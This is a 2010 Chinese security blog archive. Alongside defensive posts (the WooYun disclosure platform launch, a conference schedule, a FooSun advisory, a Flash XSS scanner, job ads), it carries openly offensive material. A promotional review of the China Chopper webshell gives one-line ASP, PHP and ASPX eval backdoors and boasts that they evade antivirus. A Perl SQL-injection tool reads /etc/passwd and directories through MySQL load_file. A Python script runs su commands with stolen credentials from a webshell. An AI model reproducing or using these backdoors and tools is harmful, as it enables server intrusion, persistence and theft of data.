鬼仔's Blog

WooYun-乌云正式上线

鬼仔 — Thu, 19 Aug 2010 18:32:35 +0800

#鬼仔：WooYun-乌云

官方网站：http://www.wooyun.org

WooYun是一个位于厂商和安全研究者之间的平台，你可以通过这个平台来接受大家报告漏洞也可以通过这个平台来报告漏洞，不同的是，所有的过程都将在WooYun上进行，你不用担心厂商像之前某些厂商所作的否认这个漏洞从而轻易否认你的努力，厂商也不用担心漏洞散落在各个Blog，论坛而导致无法及时处理导致损失，当然，这一切都是建立在尊重和荣耀这个前提。

相比漏洞的实际成因，我们更倾向于通过实际的危害来定义一个漏洞的危害和等级，所以WooYun会关注危害比较严重的譬如远程代码执行，权限提升，SQL注射之类的漏洞，一些客户端的漏洞会根据实际应用的场景和所造成的危害和影响来定义等级，譬如目前的实际环境中淘宝相对于其他厂商就比较关注 URL跳转和反射型xss漏洞。与传统的漏洞相比，我们关注服务器级别的如弱密码，不安全的服务器设置这种运维级别的问题，甚至如果有钓鱼欺诈之类对业务运营有影响的问题也可以通过平台向厂商反映。如果你能通过录像或者抓图实际证明漏洞的危害将是最好的漏洞证明方式，你可以在WooYun看到我们的漏洞分类和定义。

我们欢迎影响力大的，更重要的是注重安全的厂商在WooYun注册，同时也欢迎对漏洞研究有兴趣的白帽子来WooYun投递漏洞。为了保证WooYun的质量，目前对于厂商我们采取线下邀请的方式来注册，对于白帽子会采取投递漏洞获取邀请码的方式来注册。

我们昨天刚公布了第一批的漏洞细节，通过这些漏洞我们不只可以帮助我们分析常见的漏洞类型和原理实例，还可以更好的理解互联网安全的现状以及反思我们的安全工作本身，对于漏洞，我们有五天的确认期以给厂商时间确认漏洞的存在和一个月的保密期，厂商可以在这段较长的时间里修复自己的安全问题来避免损失。

目前WooYun完全由80sec和80sec的一些朋友利用周末时间完成，所以问题也是很多的，这里也感谢大家对各种Bug的包涵 -_-||

WooYun将按照预期持续的改进

：）

官方网站：http://www.wooyun.org
关于wooyun：http://www.wooyun.org/about.php

XCon2010会议日程

鬼仔 — Mon, 02 Aug 2010 10:51:04 +0800

# 鬼仔：帮朋友发下。最近实在是很忙，一直没更新，抱歉。

=================================================================
XCon2010会议日程
-------------------------------------------------------------------------------------------------------------
2010-8-4 XCon2010 第一天

-------------------------------------------------------------------------------------------------------------
时间演讲者议题
-------------------------------------------------------------------------------------------------------------
07:30 - 09:00 注册
-------------------------------------------------------------------------------------------------------------
09:00 - 09:10 开幕词
-------------------------------------------------------------------------------------------------------------
09:10 - 10:10 Richard Stallman 软件专利的危害
-------------------------------------------------------------------------------------------------------------
10:10 - 10:30 茶歇
-------------------------------------------------------------------------------------------------------------
10:30 - 11:30 FlashSky 基于数据流SDL的安全测试
-------------------------------------------------------------------------------------------------------------
11:30 - 12:30 刘小珍 AVM2虚拟机逃逸技术研究
-------------------------------------------------------------------------------------------------------------
12:30 - 14:30 午餐
-------------------------------------------------------------------------------------------------------------
14:30 - 15:30 陈小波 & 谢君绕过windows 7 浏览器内存保护
-------------------------------------------------------------------------------------------------------------
15:30 - 16:00 茶歇
-------------------------------------------------------------------------------------------------------------
16:00 - 17:00 玩命虚拟化病毒感染
-------------------------------------------------------------------------------------------------------------
17:00 - 18:00 nEINEI 对抗AV检测--病毒遗传感染技术探索
-------------------------------------------------------------------------------------------------------------
2010-8-5 XCon2010 第二天
-------------------------------------------------------------------------------------------------------------
时间演讲者议题
-------------------------------------------------------------------------------------------------------------
09:00 - 10:00 John Lambert 影响未来开发的9种趋势
-------------------------------------------------------------------------------------------------------------
10:00 - 10:30 茶歇
-------------------------------------------------------------------------------------------------------------
10:30 - 11:30 于淼硬件虚拟化下的反调试手段软件保护
-------------------------------------------------------------------------------------------------------------
11:30 - 12:30 FunnyWei 深入剖析及挖掘PDF漏洞
-------------------------------------------------------------------------------------------------------------
12:30 - 14:30 午餐
-------------------------------------------------------------------------------------------------------------
14:30 - 15:30 安天实验室病毒分析流水线
-------------------------------------------------------------------------------------------------------------
15:30 - 16:00 茶歇
-------------------------------------------------------------------------------------------------------------
16:00 - 17:00 XCon2010 论坛
-------------------------------------------------------------------------------------------------------------
17:00 - 17:20 XCon2010 幸运抽奖
-------------------------------------------------------------------------------------------------------------
17:20 - 17:30 闭幕词
=================================================================

风讯网站管理系统API_Response.asp页面存在越权漏洞

鬼仔 — Sun, 13 Jun 2010 01:18:45 +0800

来源：WEB应用漏洞库

影响版本:
FooSun > 5.0

漏洞分析:
在文件\API\ API_Response.asp中：

If Request.QueryString<>"" Then //第16行
SaveUserCookie()
Else
Set XmlDoc = Server.CreateObject("msxml2.FreeThreadedDOMDocument"  & MsxmlVersion)
XmlDoc.ASYNC = False
If Not XmlDoc.LOAD(Request) Then
Status = 1
Messenge = "数据非法，操作中止！"
appid = "未知"
Else
If Not (XmlDoc.documentElement.selectSingleNode("userip") is  nothing) Then
UserTrueIP = XmlDoc.documentElement.selectSingleNode("userip").text
End If
If CheckPost() Then
Select Case Act
Case "checkname"

整合文件中没有判断程序是否开启，恶意用户可以向该文件提交数据来进行修改删除用户的操作。

解决方案:
厂商补丁：
FooSun
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.foosun.net/

新浪招聘安全工程师

鬼仔 — Fri, 11 Jun 2010 17:13:15 +0800

工作地点：北京
招聘人数：1
联系邮箱：guizaicn@gmail.com
要求：熟悉钓鱼攻击和防范、XSS防护，熟悉常见的WEB漏洞，喜欢网络安全，最好有开发经验。
待遇面议

有兴趣的同学请联系。

一段扫flash跨站的脚本

鬼仔 — Fri, 11 Jun 2010 16:59:23 +0800

作者：xy7

没啥技术含量，主要是扫ExternalInterface.call

#!/usr/bin/php -q
<?php

/*--------------------------------xy7@80sec.com----------------------------
#Flash文件跨站检测脚本 2010/6/3
#检测过程如下:
提取ExternalInterface.call调用的参数，检查参数是都是直接通过loaderInfo.parameters获取
#使用方法
./scan.php /as代码目录>log
----------------------------------xy7@80sec.com---------------------------*/

set_time_limit(0);

function find($directory)
{
$mydir=dir($directory);
while($file=$mydir->read()){
if((is_dir("$directory/$file"))&&($file!=".")&&($file!=".."))
{
find("$directory/$file");
}
else{
if($file != "." && $file != ".."&&eregi(".as",$file)){
$fd=realpath($directory."/".$file);
$fp = fopen($fd, "r");
$i=0;
while ($buffer = fgets($fp, 128)) {
$i++;
if(eregi("ExternalInterface.call",$buffer))
{
echo "Line".$i.":".$buffer."\r\n\r\n";
preg_match("/\((.*)\)/i", $buffer, $match);
if (strstr($match[1],"("))
{
preg_match("/\((.*)\)/i", $match[1], $newmatch);
echo "再次提取后参数包含 :".$newmatch[1]."\r\n\r\n";
$oldfp = ftell($fp);
fseek($fp, 0);
$p = 0;
while ($newbuffer = fgets($fp, 128))
{
$p++;
if(eregi("loaderInfo.parameters",$newbuffer))
{
//echo "Line".$p.":".$newbuffer."\r\n";
if (strstr($newbuffer,$newmatch[1]))
{
echo $newmatch[1]."存在漏洞\r\n\r\n";

}
}
}
fseek($fp, $oldfp);
unset($oldfp);
} elseif(strstr($match[1],","))
{
echo "多个参数:$match[1]\r\n";
if (strstr($match[1],"loaderInfo.parameters")){
echo $match[1]."直接调用loaderInfo.parameters传递存在漏洞\r\n\r\n";
}
$var_array = array();
$var_array = explode(",",$match[1]);
$oldfp = ftell($fp);
fseek($fp,0);
while ($newbuffer = fgets($fp, 128))
{
if(eregi("loaderInfo.parameters",$newbuffer))
{
//echo "Line".$p.":".$newbuffer."\r\n\r\n";
foreach ($var_array as $value)
{
if (strstr($newbuffer,$value))
{
echo trim($value)."存在漏洞\r\n\r\n";
}

}

}
}
fseek($fp, $oldfp);
unset($oldfp);
}else
{
echo "唯一参数:".$match[1]."\r\n";
if (strstr($match[1],"loaderInfo.parameters")){
echo $match[1]."直接调用loaderInfo.parameters传递存在漏洞\r\n\r\n";
}
$oldfp = ftell($fp);
fseek($fp,0);
while ($newbuffer = fgets($fp, 128))
{
if(eregi("loaderInfo.parameters",$newbuffer))
{
//echo "Line".$p.":".$newbuffer."\r\n\r\n";
if (strstr($newbuffer,$match[1]))
{
echo trim($match[1])."存在漏洞\r\n\r\n";
}
}
}
fseek($fp, $oldfp);
unset($oldfp);
}
}
}
fclose($fp);

}
}
}
$mydir->close();
}
function all()
{
static $count = 1;
echo $count;
$count++;
}
find($argv[1]);
?>

Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly

鬼仔 — Fri, 11 Jun 2010 14:42:59 +0800

EDB-ID: 13808
CVE: 2010-1885
OSVDB-ID: 65264
Author: Tavis Ormandy
Published: 2010-06-10
Verified: Yes
Exploit Code: Download
Vulnerable App: N/A

详细的看这里：http://www.exploit-db.com/exploits/13808/

简评黑客利器——中国菜刀

鬼仔 — Thu, 10 Jun 2010 00:29:49 +0800

＃鬼仔：几个月没更新了，十分抱歉，今天先更新几篇，以后就恢复了。
这篇文章是一个朋友写的，但是他不让说他是谁，就替他保密一下了。这篇文章看起来很像软文，但是文章中介绍的还挺详细，不要把他当成软文来读就行了。

作者：XXX

我是一个玩黑很多年的人，入侵了大大小小的服务器无数，体验着入侵快感的同时，自己的技术和经验也不断提高，在渗透过程中收集了大大小小的工具一堆，都快把自己的U盘放满了，当然，随着时代和技术的进步，很多工具也相应的过时了，但是却很少去删掉，看着那些熟悉的图标，熟悉的界面，就好象看到了自己一步步成长的过程，这其中有很多是自己的作品，看着那些逐渐从丑陋过渡到简陋再过渡到精美的软件界面，呵呵，这其中的滋味，真的很感慨。

由于脚本是我自己的弱项，于是这些年收集了很多脚本后门，比如早期的站长管理助手，海洋顶端系列，砍客一句话后门，虫虫催化剂后门，还有angel的phpspy等等系列，数不胜数，当然还有后期的一堆美化版，加强版，超级加强版。算起来，娇娘asp后门美化版，是我所知的第一个流传较广的美化修改版，后来逐渐被更新的海洋顶端网替代了，渐渐淡出人们的视野，以上种种，asp,aspx,php,jsp,cfm,php,甚至wap协议通用的脚本后门，箩箩筐筐收集了一大堆，都快有10M大小了。这其中有一堆脚本是另一堆脚本的子集，而不是交集，还有不少是有后门的，不过我也懒得去分辨和筛选了，毕竟这些东东能让我用到的时候不多，常用的还是那几个脚本，比如ASP环境用这个，PHP环境用那个,JSP环境用那个，除非某些比较特别的功能，是这个常用的脚本后门里面没有的，我才去找那些不常用的脚本后门来临时代替一下，这些弄起来很烦，所以我一直在寻找着一款真正合心意的脚本后门，终于........，我发现了一个远超我想象的脚本后门-------中国菜刀。

说起菜刀，就不得不提起菜刀的作者，作者是一个退伍军人，生长在一个贫穷的农村，据说初中也没读完，英语更是不咋地，但他却自学掌握了

C++/J2ME/PHP/JSP/ASP.NET(C#,VB,C++,delphi,J#)/ASP/MySQL/MsSQL/Oracle/Informix/PostgreSQL/DB2/Sybase/Access/UNIX/LINUX/WIN/SEO/Flash(AS)/PhotoShop/Freehand

等等，当初在六七年前台湾闹独立的时候，他在国民党和民进党的网站上留下了“只有一个中国”的黑页，一举成名。

作者是一个朴实，低调的技术牛人，他这些年留下的作品很多，中国菜刀是他最新的一个作品，从他之前的作品WEBSHELL管理器的基础上修改而来，功能更加的强大。

你见过很强大的ASP后门，很强大的PHP后门，很强大的ASPX后门，那你见过很强大的asp,aspx,php三合一后门么........，没有吧，尤其是这个后门，只有一句话。

Asp环境：<%eval request("a")%>

Php环境：<?php @eval($_POST['a']);?>

Aspx环境：<% @page Language="Jscript"><%eval(Request.item["a"],"unsafe");%>

是不是很震憾，很不可思议，是的，我刚接触的时候，也是这样的想法，就这三句话，一个名不见经传的“中国菜刀”，就可以代替我那搜集了几年，大大小小几百个多种平台多种环境的脚本后门？，事实证明，我错了，原来“中国菜刀”不仅仅可以代替那些后门，而且他的功能超出我的想象，就让我慢慢说明吧。

1.就从最基本的讲起，你的脚本是不是经常被杀，你怎么变形都被杀，，传到服务器被杀导致被管理员发现，结果你的权限就没了，杀到你欲哭无泪。菜刀的一句话后门，可以避免这个问题，只有短短的一行代码，永远不会被查杀。

2.你是不是很郁闷你的后门传到服务器上连他妈都不认识了，框架变形，字体变框框，点击菜单无效，这个是因为系统语言不兼容造成的，菜刀是UINCODE方式编译,支持多国语言输入显示,完全不存在兼容性问题。

3.你是不是有很多webshell，你每次都拿记事本记下来，需要的时候，又去翻半天，弄得你很累很没脾气。有了“菜刀”，你可以很方便管理你的webshell，所有的记录都保存在加密的本地数据库里，而且支持webshell分类，让你管理得井井有条。菜刀不仅有临时锁定功能，方便你离开电脑的那小会时间不被别人偷你的webshell，也有加密功能，不输对密码，HOHO，偷了你的数据也没用。

4.再来说说数据库管理，这个是菜刀最最强大的功能，精通各平台主流数据库的作者，把这个功能写的是淋漓尽致。支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等等数据库，支持不是最主要的，功能强大，人性化才是最主要的，“菜刀”的数据库操作界面，内置了常用的数据库语句，非常直观的表列名浏览功能，自动显示表名，列名，查询语句，非常人性化的设计，更内置了不少自建的函数，方便不懂数据库的菜鸟，都能查阅数据库里的数据，再说个“菜刀”数据库管理的一个小技巧，对于access数据库，可以在菜刀的webshell操作界面，对着MDB文件点右键，点Access Management，就直接进入Access的数据库操作界面了，方便吧，嘿嘿！！

5.再说说提权这块，webshell的提权总是最让人关心的，说到提权，就不能说到webshell上的cmd执行了，有些朋友并不了解菜刀的自定义CMD路径功能，有两种方法可以设置指定的cmd路径，一就是在cmd操作界面，输入setp d:\cmd.exe，就可以了，或者把cmd.exe上传到目录，然后点右键,点virtual terminal file，就可以进入自定义CMD.EXE路径的命令行了，同样的，再给个cmd使用的小技巧，在菜刀的命令行里，可以使用cd等命令跳转目录，方便吧，嘿嘿！！嗯，另外，新版菜刀新增常用目录管理功能，你可以把你常用的目录或者提权的目录加进菜刀里，这样很方便你提权或者日常工作，是不是比那些固定了提权目录的脚本后门要牛B的多啊，哈哈。

6.还有菜刀的webshell上的文件功能功能，也是非常人性化的，文件夹和文件的图标完全模枋windows,，文件日期，文件大小，文件权限，一目了然，尤其是修改文件时间功能，非常的方便，直接对着要修改时间的文件点右键,modify the file time，然后在文件的时间那栏，输入时间，回车，就修改完了。当然，菜刀的文件管理还有新建，删除，上传，下载，编辑功能，这些大同小异，就不一一细说了。不过有个功能，还是要重点说明的，那就是目录缓存功能，菜刀可以把浏览过的webshell目录都缓存在本地，这样可以方便下次访问的时候更加快捷，最重要的是，当哪天你的权限丢了，起码你还有对方服务器的文件目录结构，方便再一次渗透。

说完大家都有的脚本后门功能，现在来说点特别的菜刀功能，非常特别跟实用的哦。菜刀的前身是WEBSHELL管理器，再结合了作者之前的web管理软件等几个工具的优点，实在是大杀器的集合体。

1：蜘蛛爬行。我很喜欢用WVS，对于WEB安全这块，功能是非常的强大，我很喜欢里面的一个功能，目录爬行，可以把WEB站的文件目录结构以很直观的形式排列出来，很方便分析。我非常惊喜的发现，菜刀居然也有这个功能，叫蜘蛛爬行。

用法:

{spider} {url:http://www.xunest.com/}

设定爬行范围

{spider} {url:http://www.xunest.com/} {range:xunest.com}

跟WVS的功能完全一样，我上次上传webshell图片的时候，不知道脚本后门给传到哪个目录，结果用菜刀的蜘蛛爬行功能找出来了，真是强大。

2：旁注查询。在渗透的时候，旁注是非常关键的，不知有多少大站是死在他邻居的进攻下啊。你见过查询同服务器的所有域名，那你见过查询同C段的所有域名不，呵呵，菜刀就可以做到

用法:

查单一IP的绑定域名
{reverse_ip} {url:http://www.xunest.com/}
扫描本C段开放的WEB服务器，并查询绑定域名
{reverse_ip_c} {url:http://www.xunest.com/}

3:字典爆破功能。你是不是很喜欢webtool的目录扫描功能呢，既然菜刀是集大成之所有者，自然是不会少了这个功能的，而且功能更加强大。

用法：

{crack} {url:http://%s/admin/} {flag:HTTP/1.1 200} {dict:list.txt}
{crack} {url:http://%s/admin/} {flag:!!HTTP/1.1 404} {dict:list.txt}
{crack} {url:http://www.xunest.com/%s/} {flag:successfully} {dict:list.txt}

%s为dict中的一行， flag:后面为返回的数据(含HTTP头部)中的特定关键字，加!!为不包含关键字为TRUE，否则包含关键字为TRUE, list.txt为当前目录下的文件，可设为绝对路径，注意：不要包含太多的行。

这个目录爆破功能，是非常灵活跟强大的，首先，可以根据返回的数据包自定义来判断目录是否存在，然后可以爆破已知目录的上级目录，举个例子，假如你知道你的目录是guanli，但是你是不知道guanli这个目录是在哪个目录里面，那么你可以

{crack} {url:http://www.xunest.com/%s/guanli/} {flag:HTTP/1.1 200} {dict:list.txt}

其实呢，菜刀还是一个浏览器。。。。。，真的，不骗你，菜刀的浏览器功能，非常简单，却非常实用，可以很方便的禁止或者开启网站的脚本、控件执行，图片显示开关，最最方便的，还是cookies编辑功能了，这个是非常重要的，谁用谁知道。菜刀的浏览器是可以直接post提交的，这个功能有什么用，相信黑黑们也不用我多说了吧。另外一个，就是自定义JS,这个据说也是很强大的，但我暂时还没用到这个功能。

总结一下，菜刀一直在完善，一直在更新，发展到现在，已经不仅仅是一个webshell管理器，可以说是一个大杀器的集合体，就算完全抛弃里面的webshell管理功能，菜刀也是一个很不错的浏览器，很不错的后台扫描工具，很不错的cookies编辑提交工具，很不错的文件管理工具，很不错的旁注软件，不单是方便各位黑客朋友使用，也很方便站长使用，毕竟里面的文件管理功能，上传下载，比FTP更加直观了，最重要的，菜刀的数据库管理功能，真的是前无古人，后无来者，非常非常方便，严重推荐大家使用。

另附作者的下一步开发计划，菜刀即将支持JSP，CFM等等，更加灵活，也考虑开放菜刀的协议跟接口，这样的话，大家可以自由写插件，也不局限于eval这样的一句话后门，另外，菜刀也将继续保持以人为本的人性化设计，会更加灵活，欢迎大家提意见。

中国菜刀的官方网站---http://www.maicaidao.com,上面有很详细的软件使用截图，也可以下载到最新版的菜刀。

某互联网公司（运营商背景）招聘安全工程师

鬼仔 — Thu, 10 Jun 2010 00:14:00 +0800

＃鬼仔：帮朋友发一个招聘的AD。

职位：安全工程师（高级安全工程师）

职位要求：
1.信息安全领域三年以上工作经验，网络安全基础知识扎实;
2.熟悉常见安全攻防技术，熟悉常见Web安全漏洞及原理（精通Web安全攻防，具有丰富经验者优先考虑）；
3.熟悉php、jsp等常见Web编程语言（有相关开发经验者优先考虑）；
4.了解常见操作系统/数据库的配置管理和安全加固；
5.了解常见网络安全产品（如FireWall、IDS、Scanner、Audit等）使用；
6.具有较强的学习能力、良好的沟通能力及高度的责任心，能适应工作压力。

岗位职责
1.负责各类安全问题的跟踪和分析，支持公司各部门日常安全工作；
2.负责辅助和跟进产品上线安全测试，引导开发人员修复安全问题；
3.负责各类安全事件的跟踪处理，提交安全事件报告；
4.负责公司定期的安全风险评估和检查；

工作地点：北京
互联网公司，运营商背景。福利不错，待遇依能力而定。
邮件主题请注明应聘，精力所限，无法做到每信必复，合则约见。望见谅。
有意请联系：cissp2005(at)sina.com

SQL注射中使用Mysql load_file解析bsd目录的脚本

鬼仔 — Wed, 09 Jun 2010 23:49:24 +0800

作者：xi4oyu

可能不少x客都知道mysql load_file能够读取文件的内容。但是在bsd平台上，load_file也能够以文件的方式读取目录内容的前512个字节。
以前遇到这种站都是泛着恶心的手工load，然后在一堆可打印字符中查找目录名称。
后来实在抗不住了，得，我还是写个“友爱”的程序来自动解析吧，这样也避免了某些情况下目录被看漏掉。
今天偶尔从硬盘里面翻到的，放出来大家用用吧，有问题反馈下。Thx

xi4oyu@3xpl4b:~$ perl dump_bsd_dir.pl
dump_bsd_dir : List freebsd DIRS USE load_file with MYSQL
By xi4oyu evil.xi4oyu#gmail.com

http://www.pentestday.com

usage: dump_bsd_dir.pl [options]
-u : Inject url
-d|-f : DIR/FILE to list
Ext: dump_bsd_dir.pl -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -d /etc
dump_bsd_dir.pl -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -f /etc/passwd

#!/usr/bin/perl
use LWP::UserAgent;
use strict;
use Getopt::Std;
use vars qw / %opt /;

use constant True => 1;

my $rep_word = "FUCKBSD";
my $sep_flag = "%!!";
my $user_agent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;.NET CLR 1.1.4122)";
my $target = '';
my $target_rep = '';
my $dir = '';
my $file = '';

sub usage{

print STDERR <<"EOF";
dump_bsd_dir : List freebsd DIRS USE load_file with MYSQL
By xi4oyu evil.xi4oyu#gmail.com

http://www.pentestday.com

usage: $0 [options]
-u	: Inject url
-d|-f   : DIR/FILE to list
Ext: $0 -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -d /etc
     $0 -u http://www.xxx.com/index.php?id=-1/**/union/**/select/**/1,FUCKBSD,3 -f /etc/passwd

EOF
	exit;

}

sub hex_str{
	my $hex_str = shift;
	my $hexed_str = "0x";
	$hexed_str .= unpack("H*",$hex_str);
	return $hexed_str;

}

#This function parsed freebsd dirent struct and print out result

=pod
	src/sys/sys/dirent.h
	Ref:http://fxr.watson.org/fxr/source/sys/dirent.h?v=FREEBSD7
   49
   50 struct dirent {
   51         __uint32_t d_fileno;            /* file number of entry */
   52         __uint16_t d_reclen;            /* length of this record */
   53         __uint8_t  d_type;              /* file type, see below */
   54         __uint8_t  d_namlen;            /* length of string in d_name */
   55 #if __BSD_VISIBLE
   56 #define MAXNAMLEN       255
   57         char    d_name[MAXNAMLEN + 1];  /* name must be no longer than this */
   58 #else
   59         char    d_name[255 + 1];        /* name must be no longer than this */
   60 #endif
   61 };
   62
   63 #if __BSD_VISIBLE
   64 /*
   65  * File types
   66  */
   67 #define DT_UNKNOWN       0
   68 #define DT_FIFO          1
   69 #define DT_CHR           2
   70 #define DT_DIR           4
   71 #define DT_BLK           6
   72 #define DT_REG           8
   73 #define DT_LNK          10
   74 #define DT_SOCK         12
   75 #define DT_WHT          14

=cut

sub parse_dir{

	my $dirent_hex = shift;
	#skip 48
	my $dir = substr($dirent_hex,48);
	my $ent_len = 9;
	my $index = 0;

	while( True ){

		my $header = substr($dir,$index,16);
		my ($inode,$ent_len,$ent_type,$name_len) = unpack("LSCC",pack("H*",$header));
		last if $ent_len == 0;
		my $name = substr($dir,$index+16,$name_len * 2);
		my $str_name = unpack("a*",pack("H*",$name));
		my $type = "file:";
		if($ent_type == 4){
			$type = "dir:";
			$str_name .= "/";

		}elsif($ent_type == 10){
			$type = "link:";

		}elsif($ent_type == 1){
			$type = "fifo:";
		}elsif($ent_type == 12){
			$type = "socket:";
		}elsif($ent_type == 6){
			$type = "blk:";
		}
		print "$type\t$str_name\n";

		$index += 2* $ent_len;

	}

}

sub get_that_shit{
	my $hexed_str = shift;
	my $url = $target;
	$url =~ s/$rep_word/$hexed_str/g;

	#print $url;
	my $ua = LWP::UserAgent->new;

        $ua->agent("$user_agent");

        my $req = HTTP::Request->new(GET => "$url");
        my $rest = $ua->request($req);
	my $content = $rest->content;
	#print $content;
	my $ret = "ERROR";
	#print $sep_flag;
	if( $content =~ /$sep_flag(.*)$sep_flag/sg){
		$ret = $1;
	}
	return $ret;

}

sub parse_dir{

	my $hex_code = shift;

}

#================================================================#
#Here We Go!

my $opt_string = "u:d:f:";

usage if $#ARGV < 0;

getopts("$opt_string",\%opt) or usage();
usage if $opt{h}; 

$target = $opt{u} if $opt{u};
$dir = $opt{d} if $opt{d};
$file = $opt{f} if $opt{f};

if(!$target || (!$dir && !$file)){
	usage();
}

my $hexed_str = "";

my $sep_flag_hex = hex_str($sep_flag);
if($dir){
	 $hexed_str = "hex(concat($sep_flag_hex,load_file(".hex_str($dir)."),$sep_flag_hex))";
}else{

	 $hexed_str = "concat($sep_flag_hex,load_file(".hex_str($file)."),$sep_flag_hex)";
}

#print $hexed_str."\n";
my $ret_str = get_that_shit($hexed_str);	

if($file){

	print $ret_str;

}else{
	parse_dir($ret_str);

}

图省事就写GET提交，POST和Cookie方式哪个蛋疼同学写好了麻烦Mail我一份。:-)

一个知道帐户名密码在Webshell下执行命令的脚本

鬼仔 — Wed, 09 Jun 2010 23:44:22 +0800

＃鬼仔：xi4oyu最近搞了一个站，这个是他新站开张放出来的。

作者：xi4oyu

新站开张，放出来吧。以前是应包总之约写的。前后也没给过几个人，算是个伪私有版。

#!/usr/bin/env python
#For God sake, Keep it priv4t3

import sys,os,time,pty
def usage():
    print "ptyexec.py: fuck the firewall block up"
    print "By xi4oyu http://www.pentestday.com"
    print "Usage: ptyexec.py <username> <passwd> <command>"
    print 'Ext: ptyexec.py root 123456 "cat /etc/passwd"'
    print 'Result will be located in /var/tmp'
    sys.exit(0)

def fuck_child(pipein):
    os.dup2(pipein,0)
    fd = open("/var/tmp/.result.txt","a")
    os.dup2(fd.fileno(),1)
    os.dup2(fd.fileno(),2)
    pty.spawn("/bin/sh")

    print "GAGA..I'm back,Alt it never be happened"
    sys.exit(0)

def fuck_it_up(user,passwd,command):
    pipein,pipeout = os.pipe()
    #Fork the fucking child
    if os.fork() == 0:
        fuck_child(pipein)
    else:
        time.sleep(2)
        os.write(pipeout,'su - %s\n'% user)
        time.sleep(2)
        os.write(pipeout,'%s\n' % passwd)
        time.sleep(2)
        os.write(pipeout,'%s\n' % command)
        time.sleep(2)
        os.write(pipeout,'exit\n');
        time.sleep(2)
        sys.exit(0)

if __name__ == "__main__":
    if len(sys.argv) != 4:
        usage()
    fuck_it_up(sys.argv[1],sys.argv[2],sys.argv[3])